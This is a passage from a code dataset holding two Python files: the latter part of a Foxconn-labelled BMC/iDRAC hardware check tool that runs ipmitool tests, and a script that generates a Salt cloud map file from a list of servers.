0x08)\n\t\tprint(\"\")\n\t\tprint(line_0)\n\t\tprint(line_1)\n\t\tprint(tmp_str)\n\t\tprint(line_1)\n\t\tprint(line_0)\n\t\tprint(\"\")\n\t\tctypes.windll.kernel32.SetConsoleTextAttribute(ctypes.windll.kernel32.GetStdHandle(-11), 0x01 | 0x02 | 0x04)\n\telse:\n\t\tprint(\"\")\n\t\tprint(\"\\033[35;1m%s\\033[0m\"%(line_0))\n\t\tprint(\"\\033[35;1m%s\\033[0m\"%(line_1))\n\t\tprint(\"\\033[35;1m%s\\033[0m\"%(tmp_str))\n\t\tprint(\"\\033[35;1m%s\\033[0m\"%(line_1))\n\t\tprint(\"\\033[35;1m%s\\033[0m\"%(line_0))\n\t\tprint(\"\")\n#===============================================================================\ndef Log(msg, color = FONT_WHITE):\n\ttmp = \"[%s] %s\\n\"%(datetime.datetime.strftime(datetime.datetime.now(), \"%y/%m/%d %H:%M:%S\"), msg)\n\n\ttry:\n\t\tf = open(os.path.join(LOG_DIR, LOG_FILE), \"a\")\n\t\tf.write(tmp)\n\t\tf.close()\n\texcept:\n\t\tprint(\"Logging Error!!\")\n\t\treturn\n\n\ttmp = tmp[:-1]\n\n\tif(color == FONT_RED):\n\t\tif(sys.platform == \"win32\"):\n\t\t\tctypes.windll.kernel32.SetConsoleTextAttribute(ctypes.windll.kernel32.GetStdHandle(-11), 0x04 | 0x08)\n\t\t\tprint(tmp)\n\t\t\tctypes.windll.kernel32.SetConsoleTextAttribute(ctypes.windll.kernel32.GetStdHandle(-11), 0x01 | 0x02 | 0x04)\n\t\telse:\n\t\t\tprint(\"\\033[31;1m%s\\033[0m\"%(tmp))\n\telif(color == FONT_GREEN):\n\t\tif(sys.platform == \"win32\"):\n\t\t\tctypes.windll.kernel32.SetConsoleTextAttribute(ctypes.windll.kernel32.GetStdHandle(-11), 0x02 | 0x08)\n\t\t\tprint(tmp)\n\t\t\tctypes.windll.kernel32.SetConsoleTextAttribute(ctypes.windll.kernel32.GetStdHandle(-11), 0x01 | 0x02 | 0x04)\n\t\telse:\n\t\t\tprint(\"\\033[32;1m%s\\033[0m\"%(tmp))\n\telif(color == FONT_YELLOW):\n\t\tif(sys.platform == \"win32\"):\n\t\t\tctypes.windll.kernel32.SetConsoleTextAttribute(ctypes.windll.kernel32.GetStdHandle(-11), 0x02 | 0x04 | 0x08)\n\t\t\tprint(tmp)\n\t\t\tctypes.windll.kernel32.SetConsoleTextAttribute(ctypes.windll.kernel32.GetStdHandle(-11), 0x01 | 0x02 | 0x04)\n\t\telse:\n\t\t\tprint(\"\\033[33;1m%s\\033[0m\"%(tmp))\n\telif(color == FONT_NONE):\n\t\tpass\n\telse:\n\t\ttry:\n\t\t\tprint(tmp)\n\t\texcept:\n\t\t\tprint(\"Logging Error!!\")\n#===============================================================================\ndef Show_Pass():\n\tif(sys.platform == \"win32\"):\n\t\tctypes.windll.kernel32.SetConsoleTextAttribute(ctypes.windll.kernel32.GetStdHandle(-11), 0x02 | 0x08)\n\t\tprint(PASS_BANNER)\n\t\tctypes.windll.kernel32.SetConsoleTextAttribute(ctypes.windll.kernel32.GetStdHandle(-11), 0x01 | 0x02 | 0x04)\n\telse:\n\t\tprint(\"\\033[32;1m%s\\033[0m\"%(PASS_BANNER))\n\n\tLog(\"Log File: %s\"%(os.path.join(LOG_DIR, LOG_FILE)), FONT_GREEN)\n\tLog(\"PASS\", FONT_GREEN)\n\tsys.exit(0)\n#===============================================================================\ndef Show_Fail(error_msg):\n\tif(sys.platform == \"win32\"):\n\t\tctypes.windll.kernel32.SetConsoleTextAttribute(ctypes.windll.kernel32.GetStdHandle(-11), 0x04 | 0x08)\n\t\tprint(FAIL_BANNER)\n\t\tctypes.windll.kernel32.SetConsoleTextAttribute(ctypes.windll.kernel32.GetStdHandle(-11), 0x01 | 0x02 | 0x04)\n\telse:\n\t\tprint(\"\\033[31;1m%s\\033[0m\"%(FAIL_BANNER))\n\n\tLog(\"Log File: %s\"%(os.path.join(LOG_DIR, LOG_FILE)), FONT_RED)\n\tLog(\"Error Message: %s\"%(error_msg), FONT_RED)\n\tLog(\"FAIL\", FONT_RED)\n\tsys.exit(-1)\n#===============================================================================\ndef Input_CMD_OS(cmd):\n\tLog(\"Input OS Command: %s\"%(cmd), FONT_YELLOW)\n\n\ttry:\n\t\tret = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell = True, universal_newlines = True).communicate()[0].splitlines()\n\texcept:\n\t\tLog(\"Input OS Command Fail (%s)\"%(cmd), FONT_RED)\n\t\treturn False\n\n\tfor i in range(len(ret)):\n\t\tret[i] = ret[i].strip()\n\t\tif(DEBUG_MODE):\n\t\t\tLog(\"ret[%02d] %s\"%(i, ret[i]), FONT_WHITE)\n\n\treturn ret\n#===============================================================================\ndef check_bmc_selftest():\n\t'''Check BMC Selftest Result'''\n\n\tflag_selftest = False\n\n\tret = Input_CMD_OS(\"ipmitool mc selftest\")\n\tif(ret == False):\n\t\treturn False\n\n\tfor i in ret:\n\t\tif(\"Selftest:\" in i and \"passed\" in i):\n\t\t\tflag_selftest = True\n\n\tif(flag_selftest == True):\n\t\tLog(\"Check BMC Selftest Result Pass\", FONT_GREEN)\n\t\treturn True\n\telse:\n\t\tLog(\"Check BMC Selftest Result Fail\", FONT_RED)\n\t\treturn False\n#===============================================================================\ndef check_bmc_version():\n\t'''Check BMC FW Version'''\n\n\tflag_version = False\n\tflag_minor1 = False\n\tflag_minor2 = False\n\tflag_minor3 = False\n\tflag_minor4 = False\n\n\tret = Input_CMD_OS(\"ipmitool mc info\")\n\tif(ret == False):\n\t\treturn False\n\n\tfor i in range(len(ret)):\n\t\tif(\"Firmware Revision\" in ret[i] and \"2.40\" in ret[i]):\n\t\t\tflag_version = True\n\t\tif(\"Aux Firmware Rev Info\" in ret[i]):\n\t\t\tif(\"0x00\" in ret[i + 1]):\n\t\t\t\tflag_minor1 = True\n\t\t\tif(\"0x2d\" in ret[i + 2]):\n\t\t\t\tflag_minor2 = True\n\t\t\tif(\"0x28\" in ret[i + 3]):\n\t\t\t\tflag_minor3 = True\n\t\t\tif(\"0x28\" in ret[i + 4]):\n\t\t\t\tflag_minor4 = True\n\n\tif(flag_version and flag_minor1 and flag_minor2 and flag_minor3 and flag_minor4):\n\t\tLog(\"Check BMC FW Version Pass\", FONT_GREEN)\n\t\treturn True\n\telse:\n\t\tif(flag_version == False):\n\t\t\tLog(\"Check BMC FW Version Fail (Major Version)\", FONT_RED)\n\t\tif(flag_minor1 == False):\n\t\t\tLog(\"Check BMC FW Version Fail (Minor Version 1)\", FONT_RED)\n\t\tif(flag_minor2 == False):\n\t\t\tLog(\"Check BMC FW Version Fail (Minor Version 2)\", FONT_RED)\n\t\tif(flag_minor3 == False):\n\t\t\tLog(\"Check BMC FW Version Fail (Minor Version 3)\", FONT_RED)\n\t\tif(flag_minor4 == False):\n\t\t\tLog(\"Check BMC FW Version Fail (Minor Version 4)\", FONT_RED)\n\t\treturn False\n#===============================================================================\ndef check_bmc_fru():\n\t'''Check BMC FRU ID 0'''\n\n\tglobal SERVICE_TAG\n\tglobal ASSET_TAG\n\n\tflag_board_mfg = False\n\tflag_board_product_name = False\n\tflag_board_product_number = False\n\n\tflag_product_mfg = False\n\tflag_product_name = False\n\tflag_product_version = False\n\t# flag_product_part = False\n\tflag_product_part = True\n\tflag_product_serial = False\n\tflag_product_asset = False\n\n\t# flag_chassis_type = False\n\t# flag_chassis_part = False\n\t# flag_chassis_serial = False\n\tflag_chassis_type = True\n\tflag_chassis_part = True\n\tflag_chassis_serial = True\n\n\tret = Input_CMD_OS(\"ipmitool fru print 0\")\n\tif(ret == False):\n\t\treturn False\n\n\tfru_id = 0\n\n\tfor i in ret:\n\t\tif(\"Board Mfg\" in i and \"DELL\" in i):\n\t\t\tflag_board_mfg = True\n\t\tif(\"Board Product\" in i and \"DSS 9500M\" in i):\n\t\t\tflag_board_product_name = True\n\t\tif(\"Board Part Number\" in i and \"0G50D4A01\" in i):\n\t\t\tflag_board_product_number = True\n\n\t\tif(\"Product Manufacturer\" in i and \"DELL\" in i):\n\t\t\tflag_product_mfg = True\n\t\tif(\"Product Name\" in i and \"DSS 9500M\" in i):\n\t\t\tflag_product_name = True\n\t\tif(\"Product Version\" in i and \"01\" in i):\n\t\t\tflag_product_version = True\n\t\tif(\"Product Part Number\" in i and \"NGNW1\" in i):\n\t\t\tflag_product_part = True\n\t\tif(\"Product Serial\" in i and SERVICE_TAG in i):\n\t\t\tflag_product_serial = True\n\t\tif(\"Product Asset\" in i and ASSET_TAG in i):\n\t\t\tflag_product_asset = True\n\n\t\tif(\"Chassis Type\" in i and \"Rack Mount Chassis\" in i):\n\t\t\tflag_chassis_type = True\n\t\tif(\"Chassis Part Number\" in i and \"D57D2\" in i):\n\t\t\tflag_chassis_part = True\n\t\tif(\"Chassis Serial\" in i and SERVICE_TAG in i):\n\t\t\tflag_chassis_serial = True\n\n\tif(flag_board_mfg and flag_board_product_name and flag_board_product_number and flag_product_mfg and flag_product_name and flag_product_version and flag_product_part and flag_product_serial and flag_product_asset and flag_chassis_type and flag_chassis_part and flag_chassis_serial):\n\t\tLog(\"Check BMC FRU ID 0 Pass\", FONT_GREEN)\n\t\treturn True\n\telse:\n\t\tif(flag_board_mfg == False):\n\t\t\tLog(\"Check BMC FRU ID %d Fail (Board Mfg)\"%(fru_id), FONT_RED)\n\t\tif(flag_board_product_name == False):\n\t\t\tLog(\"Check BMC FRU ID %d Fail (Board Product)\"%(fru_id), FONT_RED)\n\t\tif(flag_board_product_number == False):\n\t\t\tLog(\"Check BMC FRU ID %d Fail (Board Part Number)\"%(fru_id), FONT_RED)\n\t\tif(flag_product_mfg == False):\n\t\t\tLog(\"Check BMC FRU ID %d Fail (Product Manufacturer)\"%(fru_id), FONT_RED)\n\t\tif(flag_product_name == False):\n\t\t\tLog(\"Check BMC FRU ID %d Fail (Product Name)\"%(fru_id), FONT_RED)\n\t\tif(flag_product_version == False):\n\t\t\tLog(\"Check BMC FRU ID %d Fail (Product Version)\"%(fru_id), FONT_RED)\n\t\tif(flag_product_part == False):\n\t\t\tLog(\"Check BMC FRU ID %d Fail (Product Part Number)\"%(fru_id),FONT_RED)\n\t\tif(flag_product_serial == False):\n\t\t\tLog(\"Check BMC FRU ID %d Fail (Product Serial)\"%(fru_id), FONT_RED)\n\t\tif(flag_product_asset == False):\n\t\t\tLog(\"Check BMC FRU ID %d Fail (Product Asset)\"%(fru_id), FONT_RED)\n\t\tif(flag_chassis_type == False):\n\t\t\tLog(\"Check BMC FRU ID %d Fail (Chassis Type)\"%(fru_id), FONT_RED)\n\t\tif(flag_chassis_part == False):\n\t\t\tLog(\"Check BMC FRU ID %d Fail (Chassis Part Number)\"%(fru_id), FONT_RED)\n\t\tif(flag_chassis_serial == False):\n\t\t\tLog(\"Check BMC FRU ID %d Fail (Chassis Serial)\"%(fru_id), FONT_RED)\n\t\treturn False\n#===============================================================================\ndef check_bmc_chassis():\n\t'''Check BMC Chassis Status'''\n\n\tflag_system_power = False\n\tflag_system_overload = False\n\tflag_power_fault = False\n\tflag_drive_fault = False\n\tflag_fan_fault = True\n\n\tret = Input_CMD_OS(\"ipmitool chassis status\")\n\tif(ret == False):\n\t\treturn False\n\n\tfor i in ret:\n\t\tif(\"System Power\" in i and \"on\" in i):\n\t\t\tflag_system_power = True\n\t\tif(\"Power Overload\" in i and \"false\" in i):\n\t\t\tflag_system_overload = True\n\t\tif(\"Main Power Fault\" in i and \"false\" in i):\n\t\t\tflag_power_fault = True\n\t\tif(\"Drive Fault\" in i and \"false\" in i):\n\t\t\tflag_drive_fault = True\n\t\tif(\"Cooling/Fan Fault\" in i and \"false\" in i):\n\t\t\tflag_fan_fault = True\n\n\tif(flag_system_power and flag_system_overload and flag_power_fault and flag_drive_fault and flag_fan_fault):\n\t\tLog(\"Check BMC Chassis Status Pass\", FONT_GREEN)\n\t\treturn True\n\telse:\n\t\tif(flag_system_power == False):\n\t\t\tLog(\"Check BMC Chassis Status Fail (System Power)\", FONT_RED)\n\t\tif(flag_system_overload == False):\n\t\t\tLog(\"Check BMC Chassis Status Fail (System Overload)\", FONT_RED)\n\t\tif(flag_power_fault == False):\n\t\t\tLog(\"Check BMC Chassis Status Fail (Power Fault)\", FONT_RED)\n\t\tif(flag_drive_fault == False):\n\t\t\tLog(\"Check BMC Chassis Status Fail (Drive Fault)\", FONT_RED)\n\t\tif(flag_fan_fault == False):\n\t\t\tLog(\"Check BMC Chassis Status Fail (Fan Fault)\", FONT_RED)\n\t\treturn False\n#===============================================================================\ndef check_bmc_lan():\n\t'''Check BMC LAN Status'''\n\n\tflag_ip_source = False\n\n\tret = Input_CMD_OS(\"ipmitool lan print\")\n\tif(ret == False):\n\t\treturn False\n\n\tfor i in ret:\n\t\tif(\"IP Address Source\" in i and \"DHCP Address\" in i):\n\t\t\tflag_ip_source = True\n\n\tflag_lan_port = False\n\n\tret = Input_CMD_OS(\"ipmitool delloem lan get\")\n\tif(ret == False):\n\t\treturn False\n\n\tfor i in ret:\n\t\tif(\"dedicated\" in i):\n\t\t\tflag_lan_port = True\n\n\tif(flag_ip_source and flag_lan_port):\n\t\tLog(\"Check BMC LAN Status Pass\", FONT_GREEN)\n\t\treturn True\n\telse:\n\t\tif(flag_ip_source == False):\n\t\t\tLog(\"Check BMC LAN Status Fail (IP Address Source)\", FONT_RED)\n\t\tif(flag_lan_port == False):\n\t\t\tLog(\"Check BMC LAN Status Fail (LAN Port)\", FONT_RED)\n\t\treturn False\n#===============================================================================\ndef check_bmc_sdr():\n\t'''Check BMC SDR Information'''\n\n\tflag_sdr_status = True\n\n\tret = Input_CMD_OS(\"ipmitool sdr elist full\")\n\tif(ret == False):\n\t\treturn False\n\n\tfor i in ret:\n\t\tif(i != \"\"):\n\t\t\tret_list = i.split(\"|\")\n\t\t\tfor j in range(len(ret_list)):\n\t\t\t\tret_list[j] = ret_list[j].strip()\n\n\t\t\tif(ret_list[2] != \"ns\" and ret_list[2] != \"ok\" and ret_list[2] != \"lcr\" and ret_list[2] != \"ucr\"):\n\t\t\t\tflag_sdr_status = False\n\t\t\t\tbreak\n\n\tif(flag_sdr_status == True):\n\t\tLog(\"Check BMC SDR Information Pass\", FONT_GREEN)\n\t\treturn True\n\telse:\n\t\tLog(\"Check BMC SDR Information Fail (%s)\"%(ret_list[0]), FONT_RED)\n\t\treturn False\n#===============================================================================\ndef check_bmc_sensor():\n\t'''Check BMC Sensor Information'''\n\n\tflag_sensor_status = True\n\n\n\tret = Input_CMD_OS(\"ipmitool sensor\")\n\tif(ret == False):\n\t\treturn False\n\n\tcheck_list = [\"error\", \"err\", \"fault\", \"critical\", \"fail\", \"failure\"]\n\n\tfor i in ret:\n\t\tif(i != \"\"):\n\t\t\tret_list = i.split(\"|\")\n\t\t\tfor j in range(len(ret_list)):\n\t\t\t\tret_list[j] = ret_list[j].strip()\n\n\t\t\tfor item in check_list:\n\t\t\t\tif(item in ret_list[3]):\n\t\t\t\t\tflag_sensor_status = False\n\t\t\t\t\tbreak\n\tif(flag_sensor_status):\n\t\tLog(\"Check BMC Sensor Information Pass\", FONT_GREEN)\n\t\treturn True\n\telse:\n\t\tLog(\"Check BMC Sensor Information Fail (%s)\"%(ret_list[0]), FONT_RED)\n\t\treturn False\n#===============================================================================\ndef check_bmc_sel():\n\t'''Check BMC SEL Information'''\n\n\tflag_sel_overflow = True\n\n\n\tret = Input_CMD_OS(\"ipmitool sel\")\n\tif(ret == False):\n\t\treturn False\n\n\tfor i in ret:\n\t\tif(\"Overflow\" in i and \"false\" not in i):\n\t\t\tflag_sel_overflow = False\n\t\t\tbreak\n\tflag_sel = True\n\n\tret = Input_CMD_OS(\"ipmitool sel list\")\n\tif(ret == False):\n\t\treturn False\n\n\tcheck_list = [\"error\", \"err\", \"fault\", \"critical\", \"fail\", \"failure\"]\n\n\tindex = 0\n\tfor index in range(len(ret)):\n\t\tfor item in check_list:\n\t\t\tif(item in ret[index]):\n\t\t\t\tflag_sel = False\n\t\t\t\tbreak\n\n\tif(flag_sel_overflow and flag_sel):\n\t\tLog(\"Check BMC SEL Information Pass\", FONT_GREEN)\n\t\treturn True\n\telse:\n\t\tif(flag_sel_overflow == False):\n\t\t\tLog(\"Check BMC SEL Information Fail (SEL Overflow)\", FONT_RED)\n\t\tif(flag_sel == False):\n\t\t\tLog(\"Check BMC SEL Information Fail (%s)\"%(ret[index]), FONT_RED)\n\t\treturn False\n#===============================================================================\ndef main():\n\tglobal VER\n\tglobal DEBUG_MODE\n\tglobal FAIL_CONTINUE\n\tglobal LOG_DIR\n\tglobal LOG_FILE\n\tglobal SERVICE_TAG\n\tglobal ASSET_TAG\n\n\tINIT()\n\n\tBanner(\"MiG5 iDRAC FVS Tool, By Foxconn CESBG-EPDI-TE, Version: %s\"%(VER))\n\n\tif(DEBUG_MODE):\n\t\tLog(\"DEBUG_MODE\", FONT_WHITE)\n\tif(FAIL_CONTINUE):\n\t\tLog(\"FAIL_CONTINUE\", FONT_WHITE)\n\n\tLog(\"Log Directory: %s\"%(LOG_DIR), FONT_WHITE)\n\tLog(\"Log File: %s\"%(LOG_FILE), FONT_WHITE)\n\n\ttest_sequence = [\n\t\tcheck_bmc_selftest,\n\t\tcheck_bmc_version,\n\t\tcheck_bmc_fru,\n\t\tcheck_bmc_chassis,\n\t\tcheck_bmc_lan,\n\t\tcheck_bmc_sdr,\n\t\tcheck_bmc_sensor,\n\t\tcheck_bmc_sel,\n\t]\n\n\ttest_result = True\n\tresult_msg = []\n\n\ttest_start = datetime.datetime.now()\n\tLog(\"Test Start...\", FONT_YELLOW)\n\tfor test_item in test_sequence:\n\t\tLog(\"=\"*58, FONT_NONE)\n\t\tBanner(test_item.__doc__)\n\t\tLog(\"Test Item: %s (%s)\"%(test_item.__doc__, test_item.__name__), FONT_YELLOW)\n\t\ttime.sleep(1)\n\t\tif(test_item() == False):\n\t\t\ttest_result = False\n\t\t\tresult_msg.append((test_item.__name__, False))\n\t\t\tif(FAIL_CONTINUE):\n\t\t\t\traw_input(\"%s Fail!! Press ENTER to Continue...\"%(test_item.__doc__))\n\t\t\telse:\n\t\t\t\tbreak\n\t\telse:\n\t\t\tresult_msg.append((test_item.__name__, True))\n\t\ttime.sleep(1)\n\t\tLog(\"=\"*58, FONT_NONE)\n\tLog(\"Test End...\", FONT_YELLOW)\n\ttest_end = datetime.datetime.now()\n\n\tprint(\"\")\n\tLog(\"Test Start: %s\"%(str(test_start)), FONT_YELLOW)\n\tLog(\"Test End: %s\"%(str(test_end)), FONT_YELLOW)\n\tLog(\"Test Time: %s\"%(str(test_end - test_start)), FONT_YELLOW)\n\tprint(\"\")\n\tfor (item_name, result) in result_msg:\n\t\tif(result):\n\t\t\tmsg = item_name.ljust(52, \"-\") + \"[PASS]\"\n\t\t\tLog(msg, FONT_GREEN)\n\t\telse:\n\t\t\tmsg = item_name.ljust(52, \"-\") + \"[FAIL]\"\n\t\t\tLog(msg, FONT_RED)\n\tprint(\"\")\n\n\tif(test_result):\n\t\tShow_Pass()\n\telse:\n\t\tShow_Fail(\"%s Fail\"%(test_item.__doc__))\n#===============================================================================\nif(__name__ == \"__main__\"):\n\ttry:\n\t\tmain()\n\texcept Exception as e:\n\t\tprint(\"ERROR: %s\"%(str(e)))\n\t\tsys.exit(-1)\n\tsys.exit(0)\n","sub_path":"MiG5/MiG5_iDRAC_FVS_Tool.py","file_name":"MiG5_iDRAC_FVS_Tool.py","file_ext":"py","file_size_in_byte":18429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"530223008","text":"#!/usr/bin/env python\nimport sys,os\nfrom optparse import OptionParser\n\n\n# get server and asamPlatformSet\ndef getServerAndAsam ( line ):\n infoList = line.split()\n if (len(infoList) == 1):\n host = line.rstrip('\\n')\n asamPlatformSet = 'All_HCISutil'\n elif (len(infoList) == 2):\n host = infoList[0]\n asamPlatformSet = infoList[1].rstrip('\\n')\n return [host, asamPlatformSet]\n\n# get FQDN from the input host name\ndef convertFQDN ( host ):\n FQDN = host.rstrip('\\n') + '.clemson.edu'\n return FQDN\n\n# get IP from the input host name\ndef convertIP ( host ):\n fqdn = convertFQDN( host )\n addr = os.popen( 'dig +short ' + fqdn ).read()\n IP = addr.rstrip('\\n')\n return IP\n\n# get Vlan Info\ndef getVLAN ( ipAddr ):\n vlanCode = ipAddr.split('.')[2]\n vlaninfo = open('/etc/salt/cloud.file.d/vlaninfo', 'r') \n for vlan in vlaninfo.readlines():\n if (vlanCode == vlan.split(' ')[0]):\n VLAN = vlan.split(' ')[1].rstrip('\\n')\n return VLAN\n\n# read server list for generating map file\ndef readList ( file ):\n SERVERS = open(file,'r').readlines()\n return SERVERS\n\n# the targe map file to be generated\nmap = open(\"test.map\", \"w+\")\n\n# write profile:\ndef writeProfile ( map ):\n profile = options.profile\n map.write(profile + \":\\n\")\n\ndef getGateway ( ip ):\n GATEWAY = ip.replace(ip.split('.')[-1], '1')\n return GATEWAY\n\ndef getGrainRole ( host ):\n ROLE = host.split('-')[-1][0:3]\n return ROLE\n\ndef getGrainProject ( host ):\n PROJ = host.split('-')[1]\n return PROJ\n\nif __name__ == '__main__':\n # add options:\n usage = \"usage: %prog -l servers.list\"\n\n parser = OptionParser(usage=usage)\n parser.add_option(\"-l\", \"--list\", dest=\"servers\", help=\"Read the list of servers to be built\")\n parser.add_option(\"-p\", \"--profile\", dest=\"profile\", help=\"Profile templates are going to use\", default=\"oel6.6-default\")\n parser.add_option(\"-s\", \"--switch\", dest=\"switch\", help=\"Switch type for network\", default=\"standard\")\n (options, args) = parser.parse_args()\n serverList = readList( options.servers )\n \n # the targe map file to be generated\n map = open(\"test.map\", \"w+\")\n writeProfile (map)\n\n for line in serverList:\n [server, asam] = getServerAndAsam( line )\n fqdn = convertFQDN( server )\n ip = convertIP( server ) \n vlan = getVLAN( ip )\n gateway = getGateway( ip ) \n role = getGrainRole( server ) \n proj = getGrainProject( server ) \n \n map.write('%4s%s' % ('- ',fqdn+':\\n' ))\n map.write('%6s%s' % ('','devices:\\n')) \n map.write('%8s%s' % ('','networker:\\n')) \n map.write('%10s%s' % ('','name: '+ vlan + '\\n')) \n map.write('%10s%s' % ('','switch_type: ' + options.switch + '\\n' )) \n map.write('%10s%s' % ('','ip: ' + ip + '\\n' )) \n map.write('%10s%s' % ('','gateway: [' + gateway + ']\\n')) \n map.write('%10s%s' % ('','subnet_mask: 255.255.255.0\\n')) \n map.write('%10s%s' % ('','domain: clemson.edu\\n')) \n map.write('%6s%s' % ('','minion:\\n')) \n map.write('%8s%s' % ('','id: ' + fqdn +'\\n')) \n map.write('%6s%s' % ('','grains:\\n')) \n map.write('%8s%s' % ('','role: ' + role +'\\n')) \n map.write('%8s%s' % ('','project: ' + proj +'\\n')) \n map.write('%8s%s' % ('','asamPlatformSet: ' + asam +'\\n')) \n","sub_path":"buildMap.py","file_name":"buildMap.py","file_ext":"py","file_size_in_byte":3309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}